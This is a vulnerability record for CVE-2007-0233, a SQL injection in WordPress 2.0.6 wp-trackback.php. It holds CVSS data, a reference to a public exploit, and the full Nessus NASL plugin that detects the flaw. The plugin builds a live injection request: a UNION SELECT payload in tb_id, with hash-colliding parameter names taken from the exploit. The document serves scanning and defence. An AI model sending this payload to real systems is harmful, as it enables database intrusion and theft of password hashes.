CVE-2007-0233 - SQL injection vulnerability in WordPress wp-trackback.php

047910
CVSS 7.5 - HIGH (CVSS v2 base vector AV:N/AC:L/Au:N/C:P/I:P/A:P; the metric labels below use v3 wording, but the values are the v2 metrics)
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
wordpress
nessus
exploit available

Summary

wp-trackback.php in WordPress 2.0.6 and earlier does not properly unset variables when the input data includes a numeric parameter with a value matching an alphanumeric parameter's hash value, which allows remote attackers to execute arbitrary SQL commands via the tb_id parameter. NOTE: it could be argued that this vulnerability is due to a bug in the unset PHP command (CVE-2006-3017) and the proper fix should be in PHP; if so, then this should not be treated as a vulnerability in WordPress.

Exploit-Db

description: WordPress <= 2.0.6 wp-trackback.php Remote SQL Injection Exploit. CVE-2007-0233. Webapps exploit for the PHP platform.
file: exploits/php/webapps/3109.php
id: EDB-ID:3109
last seen: 2016-01-31
modified: 2007-01-10
platform: php
port: (not specified)
published: 2007-01-10
reporter: rgod
source: https://www.exploit-db.com/download/3109/
title: WordPress <= 2.0.6 - wp-trackback.php Remote SQL Injection Exploit
type: webapps

Nessus

NASL family: CGI abuses
NASL id: WORDPRESS_TB_ID_SQL_INJECTION.NASL
description: The version of WordPress on the remote host fails to properly sanitize input to the 'tb_id' parameter of the 'wp-trackback.php' script before using it in database queries.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 24014
published: 2007-01-12
reporter: This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/24014
title: WordPress Trackback 'wp-trackback.php' 'tb_id' Parameter SQL Injection
code
#
# Tenable Network Security, Inc.
#

include("compat.inc");

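# Plugin registration: metadata shown to the user and the scheduling
# hints (category, family, dependencies) used by the scanner.
if (description)
{
  script_id(24014);
  script_version("1.20");
  script_cvs_date("Date: 2018/08/07 16:46:49");

  script_cve_id("CVE-2007-0233");
  script_bugtraq_id(21983);
  # Public exploit for this issue (rgod, 2007-01-10).
  script_xref(name:"EDB-ID", value:"3109");

  script_name(english:"WordPress Trackback 'wp-trackback.php' 'tb_id' Parameter SQL Injection");
  script_summary(english:"Attempts to generate a SQL error.");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
SQL injection attacks.");
  script_set_attribute(attribute:"description", value:
"The version of WordPress on the remote host fails to properly sanitize
input to the 'tb_id' parameter of the 'wp-trackback.php' script before
using it in database queries. An unauthenticated, remote attacker can
leverage this issue to launch SQL injection attacks against the
affected application, including discovery of password hashes of
WordPress users.

Note that successful exploitation of this issue requires that PHP's
'register_globals' setting be enabled and that the remote version of
PHP be older than 4.4.3 or 5.1.4.");
  # http://www.hardened-php.net/hphp/zend_hash_del_key_or_index_vulnerability.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?ccaf872d");
  # The preconditions stated in the description (register_globals on, PHP
  # before 4.4.3 / 5.1.4) double as the workaround.  NOTE(review): the
  # temporal vector below claims an official fix (RL:OF) but no fixed
  # WordPress release is named here; confirm and add an upgrade
  # recommendation if one is known.
  script_set_attribute(attribute:"solution", value:
"Disable PHP's 'register_globals' setting or upgrade PHP to version
4.4.3 / 5.1.4 or later, which removes the precondition for exploiting
this issue. A fixed WordPress release is not known to this plugin.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  # "No exploit is required" means this plugin exploits the flaw itself
  # (see ACT_ATTACK below).
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  # A public exploit exists (EDB-ID 3109, cross-referenced above); the
  # previous value "false" contradicted that script_xref() entry.
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2007/01/10");
  script_set_attribute(attribute:"plugin_publication_date", value:"2007/01/12");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:wordpress:wordpress");
  script_end_attributes();

  # Active check: it sends a crafted POST to the target.
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.");

  # Relies on the WordPress detection plugin and a PHP-backed web server.
  script_dependencies("wordpress_detect.nasl");
  script_require_keys("installed_sw/WordPress", "www/PHP");
  script_require_ports("Services/www", 80);

  exit(0);
}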

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");

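app = "WordPress";
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80, php:TRUE);

install = get_single_install(
  app_name : app,
  port     : port
);

dir = install['path'];
install_url = build_url(port:port, qs:dir);

# Build one multipart/form-data part of the POST body.
#
# Every line terminator is a single-quoted '\r\n'.  NASL only interprets
# escape sequences in single-quoted ("impure") strings; a double-quoted
# "\r\n" joined with '+' is sent as four literal characters, which would
# corrupt the boundary line of every part after the first.  The original
# mixed the two forms, so only the first part could have been parsed.
function mp_part(boundary, name, value)
{
  return
    boundary + '\r\n' +
    'Content-Disposition: form-data; name="' + name + '"\r\n' +
    'Content-Type: text/plain\r\n' +
    '\r\n' +
    value + '\r\n';
}

# Make sure the affected script exists: a bare GET to wp-trackback.php is
# expected to answer with its "need an ID for this to work" message.
url = dir + "/wp-trackback.php";
w = http_send_recv3(method:"GET", item:url, port:port, exit_on_fail:TRUE);
res = w[2];

if ("need an ID for this to work" >< res)
{
  # Payload: a random number followed by a UNION SELECT of a marker string
  # (this plugin's name).  The detection below looks for this exact text
  # echoed back in the failed query, not merely for any database error.
  sql = rand() + "/**/UNION/**/SELECT/**/" + SCRIPT_NAME;
  bound = "bound";
  boundary = string("--", bound);

  # The two numerically named fields are taken from the public exploit
  # (EDB-ID 3109).  NOTE(review): they are presumably the Zend hash
  # values that collide with the named parameters so that the unset() of
  # register_globals variables fails (CVE-2006-3017, see the hardened-php
  # advisory) -- confirm before changing them.
  postdata =
    mp_part(boundary:boundary, name:"title",      value:SCRIPT_NAME) +
    mp_part(boundary:boundary, name:"url",        value:"nessus") +
    mp_part(boundary:boundary, name:"blog_name",  value:"nessus") +
    mp_part(boundary:boundary, name:"tb_id",      value:sql) +
    mp_part(boundary:boundary, name:"496546471",  value:"1") +
    mp_part(boundary:boundary, name:"1740009377", value:"1") +
    boundary + '--\r\n';

  # tb_id=1 in the query string presumably satisfies the script's "need an
  # ID" check, while the tb_id in the POST body carries the payload that
  # register_globals is expected to inject -- see the PHP preconditions in
  # the plugin description.
  w = http_send_recv3(method: "POST",  item: url+"?tb_id=1", port:port,
      content_type: "multipart/form-data; boundary="+bound,
      data: postdata, exit_on_fail:TRUE);
  res = w[2];

  # Report only when the page shows a WordPress database error AND that
  # error echoes our exact payload; a generic error alone is not enough.
  if (
    "class='wpdberror'" >< res &&
    " WHERE ID = " + sql + "</code>" >< res
  )
  {
    set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
    security_hole(port);
    exit(0);
  }
}
audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);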